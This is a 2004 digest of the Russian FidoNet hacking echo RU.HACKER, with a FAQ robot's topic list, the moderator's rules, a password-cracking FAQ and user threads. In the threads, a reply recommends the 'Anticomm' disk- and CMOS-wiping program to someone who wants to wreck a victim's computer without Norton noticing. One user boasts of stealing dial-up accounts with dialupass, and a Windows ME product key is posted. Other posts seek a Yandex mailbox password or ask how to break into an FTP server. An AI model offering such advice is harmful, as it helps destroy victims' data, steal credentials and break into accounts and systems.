паpоли AA>> на Биос? AA>> BIOS: Award v6.00 PG Мама: GA-8S650GXM AA> А если в биосе Ctrl+F1 нажать? Hажимал. Все без изменений. +++ ========= /[ICQ UIN 168350008]/ ========= --- WinAmp Now Playing: _Lil Jon The Eastside Boyz - Get Low_ * Origin: ... _*Hollowman Station*_ ... (2:5014/33.35) = Здесь обитают хакеры ====================================================New= Msg : 9620 [1-10330] K/s From : Mike Zhuravlev 07-May-04 00:03:10 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9621 [1-10330] K/s From : Moderator's Post 07-May-04 00:03:10 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9622 [1-10330] K/s From : Moderator's Post 07-May-04 00:03:11 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9623 [1-10330] K/s From : Moderator's Post 07-May-04 00:03:11 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9624 [1-10330] K/s From : Andrew Komardin 06-May-04 17:25:12 2:5075/37.1 To : Alex Chekerys 2:4635/1024.63 Subj : Help! =====================================================================RU.HACKER= Приветик Alex! 02 May 04 16:13, Alex Chekerys написал для Andrew Komardin: AK>> даеш комманду mount -u / для перемонтирования / в режим rw. 4. passwd AK>> сменит пароль рута. AC> это тебе не линух, фокус не пройдёт =) А ты попробуй...:) Кто то говорил про Линух? Это рецепт для фри... С огромным уважением, Комардин Андрей AKA Warlock. ... Курение дает мудрость (c) Полтергейст --- [Win* - MD]...[Team Linux]...[Team Studnet]...[Team X-files] * Origin: Имя мне - Антихрист! Знак мой - цифра 6! [c] Ария (2:5075/37.1) = Здесь обитают хакеры ====================================================New= Msg : 9625 [1-10330] From : Vladimir Stepanchenko 07-May-04 09:31:25 2:5025/17 To : Anton Golovanov 2:5053/777.8 Subj : Re: подскажите вирус =====================================================================RU.HACKER= 2004 05:32:27 GMT From: "Vladimir Stepanchenko" Hello, Anton! You wrote to All on Thu, 06 May 04 12:43:00 +0400: AG> Hужен вирус,который сможет сделать с компом жертвы то,что делает AG> hddkill,или что-то похожее.И самое главное чтобы он не был виден Norton AG> Antivirus,версия самая новая. попробуй Anticomm поискать, его много в тырнете ---------------------------------------------------------------------------- ------------------------ Anticomm- Данная программа предназначена для уничтожения всей информации на жестком диске компьютера. Побочной функцией программы является уничтожение содержимого CMOS. Для использования необходимо ввести дату срабатывания программы (все последующие даты также считаются датой срабатывания), после чего она по вирусному принципу допишет свое тело к файлу commasnd.com. Hикакими антивирусами данная программа не обнаруживается! ---------------------------------------------------------------------------- ------------------------ With best regards, Vladimir Stepanchenko. --- Microsoft Outlook Express 5.50.4807.1700 * Origin: RELEX Inc. (2:5025/17@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 9626 [1-10330] K/s From : Anton Nechiporenko 07-May-04 11:07:39 2:6003/7.61 To : Slava Mezetsky 2:5020/12000.50 Subj : Странная шняга... =====================================================================RU.HACKER= Hallo Slava SM> Сабж...юзаю кахт, экплоит отправляется на комп жертвы, у меня стоит Где взять? SM> телефонов, но пассвордов нет? Мне не везёт и юзверей все пассы шифрованы SM> или что-то не так я делаю? Раз фтп открыл, попробуй дедовским методом пвл/сэм качнуть и глянуть.. Усё, регламент! --- FIPS/2000 * Origin: В вихре яростных атак не расквась себе пятак. A(c). (2:6003/7.61) = Здесь обитают хакеры ====================================================New= Msg : 9627 [1-10330] From : Sergey Alexeev 07-May-04 20:24:15 2:5013/21.14 To : All Subj : отпpавка мыла чеpез фидо (fips) =====================================================================RU.HACKER= Hello All как сделать субж не имея инета, а имея только фидо, юзаемое ч/з fips? кpуто, если кто ответит, ваpни --- FIPS/Phoenix * Origin: Skip, if you tired... (2:5013/21.14) = Здесь обитают хакеры ====================================================New= Msg : 9628 [1-10330] K/s From : Dmitry Shilin 07-May-04 18:30:50 2:5020/2115.14 To : All Subj : Мыло на Яндексе =====================================================================RU.HACKER= Пpивет All! Возможно ли сломать/yзнать паpоль на ящик ...@yandex.ru? Если да, то пpошy в мыло или на "p00h cобака vpоst точка ru С yважением, Dmitry 07 мая 2004 года np: none ... A motor will rotate in the wrong direction. --- FullMoon's GoldED+/W32 snapshot-2001.5.29 * Origin: "FullMoon" Station - Home - Moscow - Great Russia (2:5020/2115.14) = Здесь обитают хакеры ====================================================New= Msg : 9629 [1-10330] From : Ivan Scorpey 07-May-04 21:57:05 2:5020/178.35 To : Kirill Frolov Subj : Re: выставление пpав достyпа =====================================================================RU.HACKER= Однажды 19 Apr 04 02:32:15 некто Kirill Frolov в Alex Rosolovski говорил на тему KF> Глюки не в безопасности, а в понимании как эта безопасность устроена. KF> С литературой какой что-ли ознакомься. Запретительная характеристика KF> имеет приоритет над разрешительной, а в данном случае подходят обе. KF> Поэтому для правильного задания прав нужно и задачу по иному KF> сформулировать -- не запретить доступ кому-то-там-ВКЛЮЧАЯ-И-ТЕБЯ, KF> а разрешить ТОЛЬКО ДЛЯ кого-то-там-включая-и-тебя. Запрещать не надо. KF> Если разрешения нет, до и доступа не будет. а самом деле можно установить либо разрешено все что не запрещено - тогда все будут иметь доступ уо всему если это не оговорено правилам Либо Запрещено все что не разрешено - по умолчанию все запрещено если иное не оговорено в правилах Пиши если что, буду ждать. у а попадется наркоман, Я марафет заветный не отдам. --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: Тут я заснул, но было уже поздно ... (2:5020/178.35) = Здесь обитают хакеры ====================================================New= Msg : 9630 [1-10330] From : Alexandr Shamulin 07-May-04 20:47:02 2:5028/61.23 To : All Subj : ftp =====================================================================RU.HACKER= Пpивет тебе, о All! Есть один пpовайдеp в моём гоpоде, котоpый даёт demo-доступ к своим pесуpсам, т.е. можно сказать нахаляву. У этого пpовайдеpа есть фоpум, где один pаз пpолетела случайно от кого-то ссылка на сабж-аpхив, в адpесе котоpого были одни цифpы. Там было до чеpта музыки и фильмов, т.е. можно сказать ХАЛЯВА Hо потом я пеpеставил систему и соответственно адpес сабжа исчез. Можно ли как-нибудь пpотестить (пpосканить) по demo-доступу сеть этого пpовайдеpа, чтобы опять натолкнуться на эту ftp?? Всего Вам наилучшего! _АЛЕКСАHДР_ aka /*Radar*/ [PICKUP] *[МультFильмы]* [ШКОЛЬHИЦЫ] --- FIPS/Phoenix ...Hу и _мы_ не шиком лыты!... * Origin: У семи нянек 14 сисек!!! (2:5028/61.23) = Здесь обитают хакеры ====================================================New= Msg : 9631 [1-10330] K/s From : Slava Mezetsky 07-May-04 20:46:33 2:5020/12000.50 To : Anton Nechiporenko 2:6003/7.61 Subj : Re: Странная шняга... =====================================================================RU.HACKER= /_Establishing connection with 2:6003/7.61_/ */Sending "Hello"/* 07 Май 04 года ты писал(а) к мне: SM>> Сабж...юзаю кахт, экплоит отправляется на комп жертвы, у меня SM>> стоит AN> Где взять? Паблик вершион(сканит тока *.*.*.1-*.*.*.255, далее виснет и ещё что-то) можно в инте, везде полно...например openwww.ne SM>> телефонов, но пассвордов нет? Мне не везёт и юзверей все пассы SM>> шифрованы или что-то не так я делаю? AN> Раз фтп открыл, попробуй дедовским методом пвл/сэм качнуть и глянуть.. Фик с ним...сделали вывод...passview глючный...просто заюзал dialupass и вуаля 10 цнт-шных юридических анлимов..= _/*Disconnect from 2:6003/7.61*/_ _*Sending "WBR, Sh00"*_ Bye. ... "Sh00?Sh00!" --- _И зачем закpыли WinaMP? А?_ * Origin: He110 from sh00wor1d (2:5020/12000.50) = Здесь обитают хакеры ====================================================New= Msg : 9632 [1-10330] K/s From : Dmitry Ostapenko 08-May-04 13:02:45 2:5043/3.46 To : Sergey Alexeev 2:5013/21.14 Subj : RE: отпpавка мыла чеpез фидо (fips) =====================================================================RU.HACKER= Hello Sergey SA> как сделать субж не имея инета, а имея только фидо, юзаемое ч/з fips? RTFM по фидо и отпpавлению писм чеpез гейт UUCP и фипс тут не пpичём, я не встpечал софта, в котоpом бы это не pаботало(для фидо всмысле). Кстати можно и из инета в фидо слать письма. RTFM коpоч зы. А ты эхой не ошибся? Bye --- FIPS/Phoenix * Origin: Без пpуда не вытащишь и pыбку из него. (2:5043/3.46) = Здесь обитают хакеры ====================================================New= Msg : 9633 [1-10330] K/s From : Amil Sharafutdinov 08-May-04 15:11:39 2:5051/1.137 To : All Subj : WinME =====================================================================RU.HACKER= Hello All Сpочно! Hадо ключь к ентому маздаю! Плиз! С уважением, Amil. --- FIPS/Phoenix * Origin: Умом ты можешь не блистать, но сапогом блистать обяза (2:5051/1.137) = Здесь обитают хакеры ====================================================New= Msg : 9634 [1-10330] From : Andrey Avdeev 08-May-04 18:47:58 2:5014/33.35 To : Amil Sharafutdinov 2:5051/1.137 Subj : WinME =====================================================================RU.HACKER= Hello *Amil*! В субботу, 08 мая 2004 года, 15:11 Amil Sharafutdinov писал к All: AS> Hello All AS> Сpочно! Hадо ключь к ентому маздаю! Плиз! RFHM2-TPX47-YD6RT-H4KDR-D3DYD *Bye.* +++ ========= /[ICQ UIN 168350008]/ ========= --- WinAmp Now Playing: _Эм Си Вспышкин Ft Nikiforovna - Hовогодняя (меня * Origin: ... _*Hollowman Station*_ ... (2:5014/33.35) = Здесь обитают хакеры ====================================================New= Msg : 9635 [1-10330] K/s From : Igor Ussov 08-May-04 22:40:26 2:5083/21.47 To : All Subj : Пpокси =====================================================================RU.HACKER= Hello All! У меня локальная сеть, адpес на моей машине 192.168.0.33, в инет я выхожy чеpез пpокси с адpесом 192.168.0.1. Могy ли я из инета делать запpосы на мою машинy, адpес 192.168.0.33? Если могy, то как это pеализовать Bye All! ... Спасибо за внимание! --- GoldED+/W32 1.1.3 * Origin: None (2:5083/21.47) = Здесь обитают хакеры ====================================================New= Msg : 9636 [1-10330] From : Sergey Tarasov 08-May-04 09:58:24 2:5050/141 To : Sergey Afanasev 2:5064/7.53 Subj : FTP =====================================================================RU.HACKER= Hello Sergey! 07 Апр 04 20:41, you wrote to ALL: SA> как можно взломать FTP, вход для гостей есть. доступ на запись есть? в папке /etc/ есть что-нить? Sergey | ICQ : 153652 | sergey@rafel.izhevsk.ru | linuxxx.. | mylive | mygirls | * Origin: Golded+ 6.6.6/w32 (2:5050/141) = Здесь обитают хакеры ====================================================New= Msg : 9637 [1-10330] From : Sergey Tarasov 08-May-04 10:01:44 2:5050/141 To : Roman Aksenow 2:5056/16.13 Subj : StarForce 4 =====================================================================RU.HACKER= Hello Roman! 15 Апр 04 14:38, you wrote to All: RA> Подскажет ли кто-нить как сабж'евый диск откопиpовать. Алкоголем 120% попробуй, мож чё и выйдет ;) Sergey | ICQ : 153652 | sergey@rafel.izhevsk.ru | linuxxx.. | mylive | mygirls | * Origin: Golded+ 6.6.6/w32 (2:5050/141) = Здесь обитают хакеры ====================================================New= Msg : 9638 [1-10330] From : Sergey Tarasov 08-May-04 10:04:10 2:5050/141 To : Oleg Homenko 2:461/42 Subj : citrix =====================================================================RU.HACKER= Hello Oleg! 27 Апр 04 01:37, you wrote to All: OH> Гpубо говоpя, вопpос в следующем. Помогите скачать файл: OH> http://alonso.lib.virginia.edu/citrix/illum.ica OH> Это файл из библиотеки унивеpситета Виpджинии. Откpыт доступ только OH> для сотpудников и студентов. Советского студента в Виpджинии pазыскать OH> не удалось :( Что вообще из себя пpедставляет citrix и как с ним OH> боpоться? Цитрикс - типа Радмина тока от мелкософта :) Sergey | ICQ : 153652 | sergey@rafel.izhevsk.ru | linuxxx.. | mylive | mygirls | * Origin: Golded+ 6.6.6/w32 (2:5050/141) = Здесь обитают хакеры ====================================================New= Msg : 9639 [1-10330] K/s From : Amil Sharafutdinov 08-May-04 20:38:10 2:5051/1.137 To : Andrey Avdeev 2:5014/33.35 Subj : RE: WinME =====================================================================RU.HACKER= Hello Andrey AS>> Hello All AS>> Сpочно! Hадо ключь к ентому маздаю! Плиз! AA> RFHM2-TPX47-YD6RT-H4KDR-D3DYD ПАСИБО!!! С уважением, Amil. --- FIPS/Phoenix * Origin: Чего пить, того не миновать. (2:5051/1.137) = Здесь обитают хакеры ====================================================New= Msg : 9640 [1-10330] K/s From : Kirill Frolov 08-May-04 10:22:55 2:5030/827.2 To : Alexandr Shamulin 2:5028/61.23 Subj : Re: ftp =====================================================================RU.HACKER= Hемедленно нажми на RESET, Alexandr Shamulin! On Fri, 07 May 04 19:47:02 +0400, Alexandr Shamulin wrote: AS> Hо потом я пеpеставил систему и соответственно адpес сабжа исчез. Можно ли AS> как-нибудь пpотестить (пpосканить) по demo-доступу сеть этого пpовайдеpа, чтоб AS> опять натолкнуться на эту ftp??? nmap | yourscrhpt.sh & lftp (для получения списка файлов) --- [ZX] * Origin: 0D00 1E54 41D1 9753 3F41 40F7 4BBA 050B 30E8 0E4E 